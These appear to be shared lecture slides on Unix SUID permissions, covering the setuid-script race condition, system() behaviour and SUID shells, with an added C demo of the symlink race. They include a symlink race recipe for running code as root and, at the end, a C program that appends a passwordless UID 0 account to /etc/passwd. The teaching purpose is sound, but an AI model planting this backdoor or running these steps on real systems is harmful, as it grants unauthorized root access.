Unix Permissions (cont’d)

Shared by: vok91458
posted:
5/1/2010
More on SUID
passwd attacks
SUID attacks

   • Recall the following SGID attack
   • What happens with a SUID version in Slack 7?
Linux Security

   • Cannot SUID a script
   • It “seems” that SUID for shells is not transitive for shell creation
     – i.e. the SUID’d shell has the owner’s permissions, but subsequently created shells have the runner’s permissions
   • Shells perform a “sanity check?”
Why no SUID for Script?
   • It is hard to write a safe script
   • Race conditions
Linux ignores the setuid bit, because the current method of invoking a
     script allows for a race condition. This has been solved on other Unix
     systems (like, say, Solaris) by invoking the interpreter and passing it
     an open file handle to the script instead of the name of it, breaking
     the race condition.

     From the perlsec man page:

          Beyond the obvious problems that stem from giving special
          privileges to systems as flexible as scripts, on many
          versions of Unix, set-id scripts are inherently insecure
          right from the start. The problem is a race condition in
          the kernel. Between the time the kernel opens the file to
          see which interpreter to run and when the (now-set-id)
          interpreter turns around and reopens the file to interpret
          it, the file in question may have changed, especially if
          you have symbolic links on your system.

     hint: symbolic links and an suid script make it trivial to run any
     program as the owner of the suid script on such systems, of which Linux
     is one. Set up a symlink like foo->/sbin/rootly, where rootly is
     an suid script. Then run 'foo'... if you're quick and can point foo at
     myrootshell between the time the kernel decides to run perl (or sh or
     any other #!'ist script), myrootshell will run as root... even though
     it's not suid.
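
The difference between reopening the script by name and handing over the already-open descriptor, as an added example (not code from the original slides). It works only on scratch files it creates itself; the /tmp location, the names "trusted", "other" and "foo", and the function name are assumptions made for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Create a small file (constructed sample data). Returns 0 on success. */
static int write_file(const char *path, const char *text) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Step 1 opens "foo" and records which file it is (the kernel's look at the
 * script). The link is then repointed, standing in for the race window.
 * Step 2 either reopens the name (by_name != 0) or reuses the descriptor.
 * Returns 1 if step 2 gets the file step 1 saw, 0 if not, -1 on error. */
int second_open_sees_checked_file(int by_name) {
    char dir[] = "/tmp/suidraceXXXXXX", a[64], b[64], lnk[64];
    struct stat checked, used;
    int fd1 = -1, fd2 = -1, same = -1;

    if (!mkdtemp(dir)) return -1;
    snprintf(a, sizeof a, "%s/trusted", dir);
    snprintf(b, sizeof b, "%s/other", dir);
    snprintf(lnk, sizeof lnk, "%s/foo", dir);
    if (write_file(a, "trusted\n") || write_file(b, "other\n") || symlink(a, lnk))
        goto out;
    fd1 = open(lnk, O_RDONLY);                        /* step 1: check */
    if (fd1 < 0 || fstat(fd1, &checked)) goto out;
    if (unlink(lnk) || symlink(b, lnk)) goto out;     /* name now means "other" */
    fd2 = by_name ? open(lnk, O_RDONLY) : dup(fd1);   /* step 2: use */
    if (fd2 >= 0 && fstat(fd2, &used) == 0)
        same = checked.st_dev == used.st_dev && checked.st_ino == used.st_ino;
out:
    if (fd2 >= 0) close(fd2);
    if (fd1 >= 0) close(fd1);
    unlink(lnk); unlink(a); unlink(b); rmdir(dir);
    return same;
}

int main(void) {
    printf("reopen by name: same file? %d\n", second_open_sees_checked_file(1));
    printf("reuse open fd:  same file? %d\n", second_open_sees_checked_file(0));
    return 0;
}
```

Comparing st_dev and st_ino from fstat() on the descriptor is the check that ties a decision to the file actually in hand rather than to whatever the name currently points at.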
system() command

   • This does not work?
     #include <stdlib.h>

     /* Installed SUID; system() hands the command to /bin/sh. */
     int main(void) {
         system("cat alicefile");
         return 0;
     }

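   • This does
     #include <stdio.h>

     /* Installed SUID; the file is read in this process, no shell involved. */
     int main(void) {
         FILE *fileptr;
         int c;

         fileptr = fopen("alicefile", "r");
         if (fileptr == NULL)
             return 1;
         while ((c = fgetc(fileptr)) != EOF)
             putchar(c);
         fclose(fileptr);
         return 0;
     }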
Shell Security?

   • SUID on the last program works

   • This does not
       cp /bin/sh /home/alice/shell
       chmod 4711 /home/alice/shell
       su bob
       /home/alice/shell

     – bob does not get a shell with alice’s permissions
Abuse Exploit
Abuse Results
Password Exploit
Instead

   • Try this



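#include <stdio.h>

/* Appends an account "eve" with UID 0 and an empty password field. */
int main(void) {
  FILE *fileptr;
  fileptr = fopen("/etc/passwd", "a");
  if (fileptr == NULL)
    return 1;
  fprintf(fileptr, "eve::0:0:,,,:/root:/bin/bash\n");
  fclose(fileptr);
  return 0;
}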

						